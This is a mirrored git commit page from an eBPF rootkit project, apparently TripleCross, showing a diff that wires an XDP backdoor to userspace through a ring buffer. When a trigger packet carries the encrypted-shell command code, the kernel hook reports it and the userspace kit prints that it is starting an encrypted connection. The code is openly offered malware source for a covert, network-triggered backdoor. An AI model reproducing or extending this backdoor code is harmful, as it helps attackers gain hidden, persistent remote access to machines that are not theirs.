admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-17 07:33:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Completed message passing of commands to userspace via ebpf ringbuffer

Browse Source
This commit is contained in:
h3xduck
2022-05-05 13:22:47 -04:00
parent 2deebf1b9e
commit 0553ad777f
7 changed files with 1146 additions and 1082 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

2187
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

3
src/common/map_common.h
View File

@@ -7,7 +7,8 @@ typedef enum {
INFO, INFO,
DEBUG, DEBUG,
EXIT, EXIT,
ERROR ERROR,
COMMAND
} event_type_t; } event_type_t;
struct rb_event { struct rb_event {

19
src/ebpf/include/data/ring_buffer.h
View File

@@ -42,6 +42,25 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
return 0; return 0;
} }
/**
* @brief Sends an event indicating a received command in the backdoor
*
* @return 0 if ok, -1 if error
*/
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
if(!event){
return -1;
}
event->code = code;
event->event_type = COMMAND;
event->pid = pid;
bpf_ringbuf_submit(event, 0);
return 0;
}

6
src/ebpf/include/xdp/backdoor.h
View File

@@ -4,6 +4,10 @@
#include "headervmlinux.h" #include "headervmlinux.h"
#include <bpf/bpf_helpers.h> #include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "../data/ring_buffer.h"
#include "../../common/c&c.h" #include "../../common/c&c.h"
static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
@@ -73,9 +77,11 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
//If we reach this point then we received trigger packet //If we reach this point then we received trigger packet
bpf_printk("Finished backdoor V1 check with success\n"); bpf_printk("Finished backdoor V1 check with success\n");
int pid = -1; //Received by network stack, just ignore
switch(command_received){ switch(command_received){
case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1: case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
bpf_printk("Received request to start encrypted connection\n"); bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break; break;
default: default:
bpf_printk("Command received unknown: %d\n", command_received); bpf_printk("Command received unknown: %d\n", command_received);

13
src/user/kit.c
View File

@@ -14,6 +14,7 @@
#include "../common/constants.h" #include "../common/constants.h"
#include "../common/map_common.h" #include "../common/map_common.h"
#include "../common/c&c.h"
#include "include/utils/files/path.h" #include "include/utils/files/path.h"
#include "include/utils/strings/regex.h" #include "include/utils/strings/regex.h"
#include "include/utils/structures/fdlist.h" #include "include/utils/structures/fdlist.h"
@@ -103,8 +104,18 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
}else if(e->event_type == EXIT){ }else if(e->event_type == EXIT){
}else if(e->event_type == COMMAND){
printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code);
switch(e->code){
case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
printf("Starting encrypted connection\n");
break;
default:
printf("Command received unknown: %d\n", e->code);
}
}else{ }else{
printf("UNRECOGNIZED RB EVENT RECEIVED"); printf("%s COMMAND pid:%d code:%i, msg:%s\n", ts, e->pid, e->code, e->message);
return -1; return -1;
} }